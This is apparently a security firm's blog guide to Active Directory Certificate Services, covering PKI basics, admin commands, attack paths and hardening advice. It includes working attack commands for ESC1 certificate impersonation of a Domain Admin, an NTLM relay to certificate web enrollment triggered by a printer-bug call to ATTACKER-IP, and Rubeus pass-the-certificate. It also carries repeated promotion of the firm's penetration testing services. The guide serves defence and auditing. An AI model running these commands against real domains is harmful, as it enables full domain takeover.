DATE
March 27, 2026
Active Directory Certificate Services (AD CS) is one of Microsoft's most powerful yet frequently misunderstood infrastructure components. It forms the backbone of Public Key Infrastructure (PKI) in enterprise Windows environments, enabling organizations to issue and manage digital certificates for authentication, encryption, and code signing. However, AD CS has increasingly become a prime target for attackers, with misconfigured certificate templates offering a fast lane to domain compromise.
This guide breaks down what AD CS is, how it works, common attack paths, and how your organization can stay protected.
AD CS is a Windows Server role that allows organizations to build and operate their own PKI. Rather than relying on third-party certificate authorities (CAs), enterprises can issue X.509 digital certificates internally, controlling every aspect of certificate lifecycle management.
At its core, AD CS serves several critical functions:
When deployed and configured correctly, AD CS is a robust trust anchor. When misconfigured, it becomes one of the most dangerous privilege escalation vectors in an Active Directory environment.
If your organization relies on AD CS and you want to know whether your PKI configuration is truly secure, Redfox Cybersecurity's penetration testing services can help identify gaps before attackers do.
The CA is the heart of AD CS. It issues, revokes, and manages certificates. There are two types:
Root CA: The topmost trust anchor in the PKI hierarchy. It should be kept offline for security.
Subordinate (Issuing) CA: The CA that directly issues certificates to end entities. This is the CA that users and machines interact with day to day.
Certificate templates define the rules for how a certificate can be issued, including who can request it, what Extended Key Usages (EKUs) it supports, and whether the requester can supply their own Subject Alternative Name (SAN). Template misconfigurations are the number one source of AD CS vulnerabilities.
These mechanisms allow clients to verify that a certificate has not been revoked. Broken CRL distribution points are a common misconfiguration that can lead to authentication failures or, in some cases, security bypasses.
AD CS ships with an optional web enrollment interface (certsrv) that lets users request certificates via a browser. This service, when left enabled without proper controls, is frequently abused in NTLM relay attacks.
Understanding AD CS starts with knowing how to interact with it at the command line. Below are practical commands that administrators and security professionals use regularly.
Install-WindowsFeature -Name AD-Certificate -IncludeManagementTools
Install-AdcsCertificationAuthority `
-CAType StandaloneRootCA `
-CACommonName "CorpRootCA" `
-KeyLength 4096 `
-HashAlgorithmName SHA256 `
-ValidityPeriod Years `
-ValidityPeriodUnits 10
Install-AdcsCertificationAuthority `
-CAType EnterpriseSubordinateCA `
-CACommonName "CorpIssuingCA" `
-ParentCA "CorpRootCA\CorpRootCA" `
-KeyLength 2048 `
-HashAlgorithmName SHA256
certutil -CATemplates
certreq -new request.inf mycert.csr
certreq -submit -attrib "CertificateTemplate:User" mycert.csr mycert.cer
certreq -accept mycert.cer
certutil -dump
certutil -getreg CA\CRLPublicationURLs
certutil -getreg CA\CACertPublicationURLs
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().FindAllDomainControllers() | ForEach-Object { certutil -ping $_.Name }
These commands form the foundation of everyday AD CS administration, but they are equally important for security assessments. Redfox Cybersecurity's experts use this knowledge in real-world penetration tests to evaluate your environment just as a real attacker would.
The security research paper "Certified Pre-Owned" by SpecterOps brought widespread attention to AD CS attack paths. Here are the most commonly exploited ones.
This is the most prevalent and devastating misconfiguration. If a certificate template allows the enrollee to specify a Subject Alternative Name (SAN), and the template grants enrollment to a broad group like Domain Users, an attacker can request a certificate claiming to be any user, including a Domain Admin.
Enumerating vulnerable templates using Certipy:
certipy find -u john@corp.local -p 'Password123' -dc-ip 10.10.10.10
Exploiting ESC1 to impersonate a Domain Admin:
certipy req -u john@corp.local -p 'Password123' \
-ca CORP-CA -template VulnTemplate \
-upn administrator@corp.local \
-dc-ip 10.10.10.10
Authenticating with the obtained certificate:
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
This yields a TGT and NTLM hash for the administrator account, leading to full domain compromise.
If the CA web enrollment endpoint (certsrv) is accessible and does not enforce HTTPS with Extended Protection for Authentication (EPA), an attacker can relay NTLM authentication captured from a domain controller to obtain a Domain Controller certificate, enabling a DCSync attack.
Setting up a relay attack using Impacket and Certipy:
# Terminal 1: Start relay server pointing to CA web enrollment
ntlmrelayx.py -t http://CA-SERVER/certsrv/certfnsh.asp \
-smb2support --adcs --template DomainController
# Terminal 2: Trigger authentication from a DC
printerbug.py corp.local/john:Password123@DC01.corp.local ATTACKER-IP
Authenticate using the relayed certificate:
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
If a low-privileged user has write permissions over a certificate template object in Active Directory, they can modify the template to introduce an ESC1-style misconfiguration and then exploit it.
Check for overly permissive ACLs on templates:
Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local" `
-Filter * -Properties nTSecurityDescriptor | Select-Object Name, nTSecurityDescriptor
When this flag is set on a CA, any certificate request, regardless of the template, can include attacker-specified SANs. This is a CA-level misconfiguration rather than a template-level one.
Check for this flag:
certutil -getreg Policy\EditFlags
If the output includes EDITF_ATTRIBUTESUBJECTALTNAME2, the CA is vulnerable.
These are just a few of the thirteen-plus ESC (Escalation) paths documented in the wild. A comprehensive AD CS audit performed by a skilled red team is the most reliable way to know your exposure level. The team at Redfox Cybersecurity specializes in Active Directory attacks, including full AD CS assessments.
Use Certipy or PSPKIAudit to enumerate all templates and flag dangerous configurations.
# Using Certipy to find all misconfigurations
certipy find -u john@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable -stdout
# Using PSPKIAudit
Import-Module PSPKIAudit
Invoke-PKIAudit
Never grant enrollment rights to broad groups like Domain Users or Authenticated Users unless absolutely necessary. Apply the principle of least privilege to all templates.
certutil -setcatemplates -TemplateName
Review all published templates and unpublish any that are not actively in use.
Remove-WindowsFeature ADCS-Web-Enrollment
If web enrollment must remain active, enforce HTTPS and enable Extended Protection for Authentication (EPA) to prevent NTLM relay attacks.
certutil -setreg Policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc && net start certsvc
certutil -setreg CA\AuditFilter 127
net stop certsvc && net start certsvc
This enables logging for certificate requests, revocations, and configuration changes. Forward these logs to your SIEM for alerting on suspicious activity.
Watch for accounts authenticating via Kerberos PKINIT (certificate-based Kerberos) that do not normally do so, particularly privileged accounts. This is a strong indicator of ESC1 or ESC8 exploitation.
AD CS has become a standard pillar of Active Directory penetration testing. Modern red teams routinely include AD CS enumeration and exploitation as part of their internal network assessment workflow, and blue teams are increasingly building detections around these attack paths.
Certify.exe find /vulnerable
Certify.exe request /ca:CORP-CA /template:VulnTemplate /altname:administrator
After obtaining a certificate via ESC1 or ESC8, Rubeus can be used to perform Pass-the-Certificate:
Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:pfxpassword /ptt
This injects a TGT for the administrator directly into memory without ever knowing the account's password, a highly stealthy lateral movement technique.
Understanding how attackers chain these techniques together is essential for building effective defenses. If your internal security team lacks the bandwidth or expertise to perform this level of assessment, Redfox Cybersecurity's penetration testing team offers thorough Active Directory and AD CS engagements tailored to your environment.
Here is a quick reference for security teams auditing their AD CS deployment:
Template-Level Checks
CA-Level Checks
Operational Checks
Active Directory Certificate Services is far more than a certificate-issuing mechanism. It is a trust infrastructure that, when compromised, can grant attackers persistent, stealthy access across an entire domain. The rise of well-documented attack tooling like Certipy, Certify, and Rubeus means that any organization running AD CS without a proper security review is operating with significant blind spots.
Whether you are a sysadmin looking to understand what you have deployed, a security analyst building detections, or an executive trying to understand your risk exposure, the message is clear: AD CS deserves dedicated attention in your security program.
Redfox Cybersecurity offers specialized penetration testing and red team services that include comprehensive Active Directory and AD CS assessments. Their team identifies exploitable misconfigurations, validates attack paths, and provides actionable remediation guidance, giving you a clear picture of your PKI security posture before a real attacker gets there first.
Secure your AD CS environment today. Contact Redfox Cybersecurity to schedule a penetration test.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.jpg)
.avif)
%20Attack%20(1).jpg)
